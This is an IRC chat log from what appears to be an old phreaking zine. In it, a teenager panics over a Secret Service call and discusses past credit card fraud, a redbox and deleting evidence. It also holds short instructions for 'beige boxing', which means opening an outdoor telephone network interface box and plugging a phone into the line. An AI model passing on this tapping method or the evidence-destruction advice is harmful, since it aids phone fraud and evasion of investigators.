[9:50] <shoelace> hi
k0w.com
[9:50] <shoelace> guess what happened this morning?
<Keystroke> what?
<Keystroke> u harass OCI?
[9:50] <shoelace> i'll tell u in here
[9:50] <shoelace> um
[9:50] *** W sets mode: +o Keystroke
[9:51] <shoelace> i was just awoken five minutes ago
[9:51] *** Keystroke sets mode: +o shoelace
<Keystroke> cool
[9:51] <shoelace> and my mom told me that the secret service had just called
neeeding to talk to my dad
[9:51] <shoelace> and she said, she being the secret service person
[9:51] <shoelace> that our number keeps coming up on their screens
[9:51] <shoelace> part two
[9:51] <shoelace> first
<Keystroke> :/
[9:52] <shoelace> why would my main line, the one being for my parents
[9:52] <shoelace> come up on their screens, when the only thing i ever do is with my
computer line
[9:52] <shoelace> fuck
[9:52] <shoelace> fuc
[9:52] <shoelace> fuck
[9:52] <shoelace> part three
[9:52] <shoelace> the first thing i thought of was my credit card fraud
<Keystroke> what # did the secret service call from? ill prank em!
[9:53] <shoelace> but how could that be it, if the only thing i have done is on MY
fone line?
[9:53] <shoelace> hmmm..
<Keystroke> did u ever call NE1 rpom your parents #?
[9:53] <shoelace> dont know
[9:53] <shoelace> we dont have caller id
<Keystroke> from
<Keystroke> *69! :P
<Keystroke> hmmmm
<Keystroke> like
[9:53] <shoelace> whats NE1?
[9:53] <shoelace> oh
<Keystroke> maybe they knew that was a puter line
[9:53] <shoelace> anyone
[9:53] <shoelace> fuck
<Keystroke> if it only calls your ISP
<Keystroke> and like the cc#'s
[9:53] <shoelace> no
[9:53] <shoelace> it calls friends also
[9:53] <shoelace> fuck
<Keystroke> they still know its not the main line
[9:54] <shoelace> it *might* be about the voice mail that dr1x set up for me
<Keystroke> what are their screens?
[9:54] <shoelace> because Phrax had one, dr1x had one, i had one, and REailty had one
<Keystroke> maybe
<Keystroke> :/
<Keystroke> all i know is DONT TALK TO ME!
<Keystroke> jk :P
<Keystroke> maybe your parents did something
[9:57] <shoelace> FUCK
[9:57] <shoelace> MY MOM JUST CAME DOWN HERE
[9:57] <shoelace> she said that this is the deal
[9:57] <shoelace> someone has been prank calling the s. s. and leaving obsene
messages, and they sound like they are drunk
[9:57] <shoelace> here is the deal..
[9:57] <shoelace> beige box
[9:57] <shoelace> i DID find my box unscrewed the other day
[9:57] <shoelace> no joke
[9:58] <shoelace> Key
[9:58] <shoelace> can u give me some advice?
<Keystroke> sure
<Keystroke> someone has been prank calling the s. s. and leaving obsene messages,
and they sound like they are drunk?!~!
<Keystroke> werd
<Keystroke> :(
<Keystroke> beige box?
<Keystroke> unscrewed?
<Keystroke> what ya mean?
<Keystroke> the NID?
[10:00] <shoelace> nid?
[10:00] <shoelace> fuck
[10:00] <shoelace> thats what they say..
<Keystroke> what was unsecrewed?
[10:00] <shoelace> ok
<Keystroke> you were framed dude :/
[10:00] <shoelace> here in tennessee
<Keystroke> yes?
[10:01] <shoelace> there are the network interface boxes
[10:01] <shoelace> u unscrew them
[10:01] <shoelace> they are gray little boxes outside
[10:01] <shoelace> u unscrew them
[10:01] <shoelace> and open them up
[10:01] <shoelace> and there is a small fone jack with a line in it
[10:01] <shoelace> u take out the line
[10:01] <shoelace> and plug in the fone
[10:01] <shoelace> a cheap/easy beige box
[10:01] <shoelace> goddamnit
<Keystroke> yours was unsecrewed?
<Keystroke> well
[10:02] <shoelace> yes
<Keystroke> its something done recently...
[10:02] <shoelace> ja
<Keystroke> cause the SS dosnt think its nething big
<Keystroke> kids fooling around
<Keystroke> its not like they are waiting
<Keystroke> and think they can make a big bust
<Keystroke> done yesterday, the day b4 or this morning
<Keystroke> when was the NID open?
<Keystroke> but now like
<Keystroke> they may investiagte u
<Keystroke> and find what u did with CC#'s
[10:03] <shoelace> nah man
[10:03] <shoelace> im gonna del everything
[10:03] <shoelace> hide my redbox
<Keystroke> u better
[10:03] <shoelace> fucking del all my anarchist shit
[10:03] <shoelace> delete fucking everything
<Keystroke> uhm
[10:03] <shoelace> I GN0
<Keystroke> netscape too
[10:04] <shoelace> I'LL HAX0R THEM
[10:04] <shoelace> yea yea
<Keystroke> when u did thoes conf's
[10:04] <shoelace> and del all my 0-day pron
<Keystroke> they were logged
<Keystroke> hehe
<Keystroke> did u use a proxy?
[10:04] <shoelace> proxy?
<Keystroke> umm hmm
<Keystroke> did u connect directally?
[10:04] <shoelace> no
<Keystroke> how did u connect?
[10:05] <shoelace> i didnt even use my own account
[10:05] <shoelace> well i dialed in and all
<Keystroke> good
<Keystroke> thats ok
<Keystroke> they wun look at that
[10:05] <shoelace> good
<Keystroke> hopefully
<Keystroke> probably
[10:06] <shoelace> yea
[10:07] <shoelace> well
[10:07] <shoelace> tell everyone to give me best wishes
[10:07] <shoelace> im gonna go fix my computer so i dont get fucked over hard
[10:07] <shoelace> see ya
<Keystroke> k
[10:07] *** shoelace has quit IRC (I'm the cherry on the top of your ice cream...)
<Keystroke> :(
<Keystroke> ill be back in an hour
*** Retrieving #downinit channel info...
[10:34] *** Justyfied (j_n3@ppp273.localnet.com) has joined #downinit
[10:35] *** Justyfied has quit IRC (Leaving)
[10:36] *** Barry has quit IRC (Ping timeout for Barry[martin.barry.edu])
[10:56] *** shoelace (~shoelace@BULL-MAX144.DYNAMIC.USIT.NET) has joined #DowNINit
[10:57] <shoelace> Key
<Keystroke> hihi
[10:58] <shoelace> i have a new thing
[10:58] <shoelace> i called my old vmb that dr1x set up for me
<Keystroke> i c
[10:58] <shoelace> and cussed some guy out saying to change my password back a while
ago
<Keystroke> :/
[10:59] <shoelace> do you think that could be anything about it?
<Keystroke> naaaa
[10:59] <shoelace> FUCK
[10:59] *** shoelace has quit IRC (GOTTA CHANGE MY USER ID TO FUNKDAT, BRB)
[11:01] *** shoelace (~funkdat@BULL-MAX144.DYNAMIC.USIT.NET) has joined #DowNINit
<Keystroke> why new ident?
[11:02] <shoelace> whY?
[11:02] <shoelace> because the bots read funkdat
[11:02] <shoelace> not shoelace
<Keystroke> i c
<Keystroke> heh
[11:04] <shoelace> fuck
[11:04] <shoelace> heeh
[11:04] <shoelace> thanks for the note
[11:04] <shoelace> heh
<Keystroke> np
<Keystroke> heheh
[11:07] *** shoelace has quit IRC (gots ta go get mah liscense ta dr1v3...
KEY$^@@$^# PRAY FOR ME WITH THE S. S. THING$#^#$^#$^ and tell Tcon about it$@^^$$%)
_____________________________________________________________
------------------------ ----------------------
-[HAVOC Bell Systems]- -[Acknowledgements]-
------------------------ ----------------------
ArcAngl : Just joined up
Agrajag : Back from the dead btm : Elite
darkcyde : #phreak old-schooler digipimp : Co-conspirator
Digital_X : Nemesis (MIA?) dr1x : It's 420!
disc0re : Thinks were on NBC ec|ipse : Hysterical b1tch
Keystroke : Submissions Editor shamrock : paranoid b1tch
KungFuFox : Helped Reform #phreak RBCP : Funniest man alive
memor : Ueberleet French phreak shoelace : visited by the SS
psych0 : Lame ass mofo WeatherM : anarchist
REality : Owns Own3r darc : Left #phreak
Scud-O : Laid off from Wal-Mart JP : the man with connections
Redtyde : #phreak not so old-schooler tombin : phear da b1tch!
theLURK3R : Incarerated antifire : NT security guru
UnaBomber : Tired of IRC (MIA?) WaRsPrItE : #phreak WAY old-schooler
FH : want scud to have ICQ
------------------- TMessiah : Likes PGP
-[ Channels ]- Revelation: old schooler
------------------- Modify : Lives near Scud-O
#phreak : Home Sweet Home |Banshee| : is a hick
#sin : SIN Home mC : infected.com - nuff said!
#hackphreak : cool channel silitoad : Did ya like thtj?
Phrax : Cell guy
_____________________________________________________________
Issue 14 is out September 1st!
Send all articles for issue 13 to Keystroke at: keystroke@thepentagon.com
Tune in next time, Same Bat Time, Same Bat Channel!
==========================================================
= Is this copy of The HAVOC Technical Journal skunked? =
= If this file doesn't read at 155344 bytes, it probably =
= doesn't have a born on date! Get a fresh copy from our =
= NEW site at: http://www.thtj.com =
==========================================================
-[End of Communique]-